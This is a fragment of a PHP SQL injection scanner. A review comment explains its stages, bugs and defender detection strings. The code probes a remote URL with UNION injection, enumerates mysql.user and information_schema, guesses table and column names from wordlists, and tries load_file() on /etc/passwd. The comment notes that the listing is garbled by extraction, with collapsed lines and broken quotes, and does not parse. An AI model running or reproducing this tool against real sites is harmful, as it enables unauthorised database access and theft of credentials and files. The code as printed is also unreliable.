/*
 * Fragment of a PHP script that probes a remote URL for UNION-style SQL
 * injection and, after a hit, enumerates the database behind it. The opening
 * PHP tag and the definitions of $web, $max, $string, $iny_1, $iny_3, $from
 * and $end are outside this excerpt, so their exact contents are not known.
 *
 * NOTE(review): the listing is damaged by extraction and is kept exactly as
 * published. Statements were collapsed onto four physical lines, so the
 * `//echo $webmas;` debug comment now swallows the rest of the first line,
 * and the echo statements that printed result links lost their opening
 * markup, leaving unbalanced quotes. It does not parse in this form.
 *
 * Stages, as far as the visible code shows:
 *  1. Simple scan: for $a_for = 1..$max, append a hex-encoded "-N" suffix to
 *     $iny_2, fetch $web.$iny_1.$iny_2.$end with file_get_contents() and look
 *     for $string in the response with strpos(). On a miss another column
 *     (','.$iny_3) is appended and N is recorded in $iny_vuln. On a hit the
 *     column count is stored in $f_num, every position whose marker
 *     ($string.'-'.N) is present in the response is pushed onto $vulns, the
 *     report is appended to $_SESSION['all_saveds'] ("SALVANDO" = "saving")
 *     and the constant `vuln` is defined as 'yes'.
 *  2. mysql.user test ($MySqluser == "S"): same request with
 *     $from.'mysql.user' appended.
 *  3. information_schema test ($InforMationSchema == "S"): same request with
 *     $from.'information_schema.tables' appended.
 *  4. Table and column guessing ($TblBrt / $ColBrt == "S"): candidate names
 *     are read from 1.txt, 2.txt or 3.txt ($TblFormat / $ColFormat) and
 *     requested one at a time; column names are wrapped in concat() with the
 *     hex-encoded marker at each position listed in $vulns.
 *  5. load_file() test ($LdFl == "S"): asks the database to read /etc/passwd
 *     and reports ENABLED when 'root:x:' appears in the response.
 *
 * Behaviour to keep in mind when reading its output:
 *  - Every strpos() result is tested for truthiness, so a marker at offset 0
 *    counts as "not found"; the @ prefix hides fetch errors, so a failed
 *    request is reported the same way as a negative result.
 *  - The `<=` bounds on the loops over the file() arrays read one index past
 *    the end of each wordlist.
 *  - `vuln` and `load_file` are compared as bare constants before they are
 *    necessarily defined.
 *
 * Defender's view:
 *  - All probing is done with file_get_contents(), i.e. plain GET requests
 *    from PHP's HTTP stream wrapper, which sends a User-Agent only if the
 *    user_agent ini setting or a stream context supplies one.
 *  - The traffic is a burst of near-identical requests to one URL whose
 *    injected part (presumably in the query string) grows by one column per
 *    request, followed by requests that name mysql.user,
 *    information_schema.tables, concat(0x...) and load_file(0x...). Those
 *    strings in access logs or WAF events are a reliable sign of this kind
 *    of automated probing.
 *  - Mitigation is on the application side: parameterised queries for the
 *    affected parameter, and a database account for the web application that
 *    has neither the FILE privilege nor read access to mysql.user.
 */
if(isset($scann) && $web!="") { for($a_for=1;$a_for<=$max;$a_for++) {$iny_2=$iny_2.'2d'.bin2hex($a_for);$iny=$web.$iny_1.$iny_2;$webmas = $iny;$contenido = @file_get_contents($webmas.$end);$alert = strpos($contenido,$string); if(!$alert) {$iny_2=$iny_2.','.$iny_3;$iny_vuln .= $a_for.','; } else {$f_num=$a_for;$web_final=$web.$iny_1.$iny_vuln.$f_num;//echo $webmas;echo '[+] Bug Found in: '.$a_for." ".'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''." "; echo 'vuln in num/s: |';/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for." ".'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''." ".'vuln in num/s: |';/*********************************SALVANDO***************************************/$vulns=array(); for($search_for=1;$search_for<=$a_for;$search_for++) { if(strpos($contenido,$string.'-'.$search_for)) { echo $search_for.'|';/*********************************SALVANDO********************** *****************/$_SESSION['all_saveds'] .= $search_for.'|';/*********************************SALVANDO********************** *****************/array_push($vulns,$search_for); } }/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= " ".'---------------------------------------------'.'------------------------------------------------'." ";/*********************************SALVANDO***************************************/echo " ".'---------------------------------------------'.'------------------------------------------------'." 
";$a_for=$max;define('vuln','yes'); } if(!$alert && $a_for==$max) { echo 'no vuln in 1->'.$max."\n"; }$contenido=''; } }/* FINAL SIMPLE SCANN */if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S") {$from_mysql_user=$from.'mysql.user';$contenido = @file_get_contents($webmas.$from_mysql_user.$end);$alert_mysql_user = strpos($contenido,$string); if($alert_mysql_user) { echo '[+] MySQL Database Found:'.' '; echo '.htmlentities($web_final.$from_mysql_user.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_mysql_user.$end).''." "; echo '[+] Columns default in mysql.user: Host,User,Password'.' '; } else { echo '[+] MySQL Database not Found:'.' '; } echo '-------------------------------'." "; }/* FINAL Mysql.user TEST */if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S") {$from_information_schema=$from.'information_schema.tables';$contenido = @file_get_contents($webmas.$from_information_schema.$end);$alert_information_schema = strpos($contenido,$string); if($alert_information_schema) { echo '[+] Information_Schema Database Found:'.' '; echo '.htmlentities($web_final.$from_information_schema.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_information_schema.$end).''." "; echo '[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.' '; echo '---------------'." "; echo '[+] Columns default in information_schema.columns: TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'.' '; } else { echo '[+] Information_Schema Database not Found:'.' '; } echo '-------------------------------'." 
"; }/* FINAL information_schema database */if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat)) { switch($TblFormat) { case 1:$file_txt_tables='1.txt'; break; case 2:$file_txt_tables='2.txt'; break; case 3:$file_txt_tables='3.txt'; break; default:$file_txt_tables='1.txt'; }$file_tables=@file($file_txt_tables);$count_tables=count($file_tables); for($t_for=0;$t_for<=$count_tables;$t_for++) {$file_tables[$t_for]=trim($file_tables[$t_for]); if($file_tables[$t_for] != "") {$from_table=$from.$file_tables[$t_for];$contenido = @file_get_contents($webmas.$from_table.$end);$alert_table = strpos($contenido,$string); if($alert_table) { echo '[+] Table Found: '.$file_tables[$t_for]." "; echo '.htmlentities($web_final.$from_table.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_table.$end).''." ";/* echo 'webmas:'.$webmas.' '; echo 'webfinal:'.$web_final.' '; echo 'web:'.$web.' '; */if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat)) {/**************************************************************** *******/switch($ColFormat) { case 1:$file_txt_columns='1.txt'; break; case 2:$file_txt_columns='2.txt'; break; case 3:$file_txt_columns='3.txt'; break; default:$file_txt_columns='1.txt'; }$file_columns=@file($file_txt_columns);$count_columns=count($file_columns);$count_vulns=count($vulns);$count_vulns = $count_vulns + 1; for($c_for=0;$c_for<=$count_columns;$c_for++) {$file_columns[$c_for]=trim($file_columns[$c_for]); if($file_columns[$c_for] != "") { for($cols_for=1;$cols_for<=$f_num;$cols_for++) { if(in_array($cols_for,$vulns)) { if($cols_for != $f_num) {$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].'),'; } else {$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].')'; } } else { if($cols_for != $f_num) {$cols_brt_string .= $cols_for.','; } else {$cols_brt_string .= $cols_for; } } }$col_contenido=@file_get_contents($web.$iny_1.$cols_brt_string.$from_table.$end);$alert_col = strpos($col_contenido,$string); 
if($alert_col) { if($cols_vulns=="") {$cols_vulns =$file_columns[$c_for]; } else {$cols_vulns .= ','.$file_columns[$c_for]; }/* $cols_brt_string=str_replace('concat(0x'.bin2hex($string).',','', $cols_brt_string); $cols_brt_string=str_replace(')','', $cols_brt_string); echo '[+] Column Found in '. $file_tables[$t_for]. ': '.$file_columns[$c_for].' '; echo ' htmlentities($web. $iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'. htmlentities($web. $iny_1.$cols_brt_string.$from_table.$end).''." "; */}$cols_brt_string=''; }/**/} if($cols_vulns!="") { echo '[+] Column/s Found in '.$file_tables[$t_for].' : '.$cols_vulns.' ';$cols_vulns=''; }/**************************************************************** *******/} echo '-------------------------------'." "; } } } }/* FINAL TABLE AND COLUMNS BRUTEFORCE */if(vuln=="yes" && isset($LdFl) && $LdFl=="S") {$string_alert_loadfile = 'root:x:'; for($load_file_for=1;$load_file_for<=$f_num;$load_file_for++) { if(in_array($load_file_for,$vulns) && load_file!="yes") { if($load_file_for != $f_num) {$load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.','; } else {$load_file_string .= 'load_file('.$load_file_for.')'; }define('load_file','yes'); } else { if($load_file_for != $f_num) {$load_file_string .= $load_file_for.','; } else {$load_file_string .= $load_file_for; } } }$web_load=$web.$iny_1.$load_file_string.$end;$contenido_load = @file_get_contents($web_load);$alert_load_file = strpos($contenido_load,$string_alert_loadfile); echo '[+] load_file(): '; if($alert_load_file) { echo 'ENABLED'.' '; echo '.htmlentities($web_load).'" TARGET=BLANK>'.htmlentities($web_load).''." "; } else { echo 'DISABLED'.' '; } echo '-------------------------------'." "; }/* FINAL LOAD_FILE() TEST */?> |